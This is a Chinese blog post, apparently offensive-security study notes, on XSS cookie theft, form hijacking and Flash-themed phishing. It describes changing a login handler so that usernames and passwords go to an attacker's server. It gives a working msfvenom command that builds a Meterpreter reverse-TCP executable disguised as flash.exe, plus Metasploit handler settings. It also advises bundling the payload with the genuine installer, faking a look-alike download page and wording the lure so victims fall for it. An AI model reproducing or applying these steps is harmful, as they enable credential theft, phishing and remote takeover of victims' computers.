WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑

XSS-后台植入Cookie&表单劫持

 思路:

因为cookie有可能会有过滤情况导致获取不全,那么就可以使用获取表单密码的方法,同时解决劫持密码但检测或解密不出来的一种思路同时保证权限维持

表单密码(白盒):查看登录界面,在登陆页面处填写代码获取账户密码并通过js代码发送到指定位置,在目的服务器处编写接受文件即可 

这是一个本地登录页面的CMS,当登录成功后会跳转到index页面

 

 

 直接利用xss平台获取代码,将代码放到index页面的首部,那么在登陆成功后访问index页面就会执行该代码,在xss平台上就会获取cookie

 

 

 

 

 

代码仔细对比XSS平台获取的cookie和页面登录的cookie发现会有不同,多了一个sessid的值,那么这里就用一个新方法--表单劫持。

 

可以发现登录后会访问一个叫login_check.php的页面,那么查看页面,简单的分析了一下代码,在指定为添加SQL语句,让登录的账号和密码直接发送到指定的IP地址出。 

 

在服务器出简单的写一个接受代码并写入到myfile文件中。

当用户登录后,账号和密码传递到服务器上,服务器接受并写入文件,直接查看文件的代码即可。

 

 

 

XSS-Flash钓鱼配合MSF捆绑上线

-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)

1、生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe

2、下载官方文件-保证安装正常

3、压缩捆绑文件-解压提取运行

4、MSF配置监听状态

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 6666

run

5、诱使受害者访问URL-语言要适当

思路:建立一个伪造的下载连接,然后后门脚本和软件同时压缩,诱导目标去下载安装,在服务器上进行监听,获取权限。

伪造一个下载文件的页面,域名和页面尽量与真文件页面相似。

用户访问页面通常是为了下载文件,所以可以将立即下载的地址改为后门代码下载的地址,但用户点击后就会执行代码的下载,进行也包含真正的文件,以防目标用户发现没有想要的文件起疑心。

 

 

利用kali生成后门脚本,并将正确的文件与后门脚本一起压缩

注意:尽量设置解压缩后先运行后门代码再运行脚本

 

 

 

 

简单的修改一下图标,为了显得更加真实

 

 

修改下载地址,并在服务器上进行监听。诱惑对方点击你所发送的连接并进行下载,或者利用beef进行跳转。当解压缩后并安装软件后,服务器上就可以直接获取权限。

 

 

 

 

 

  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值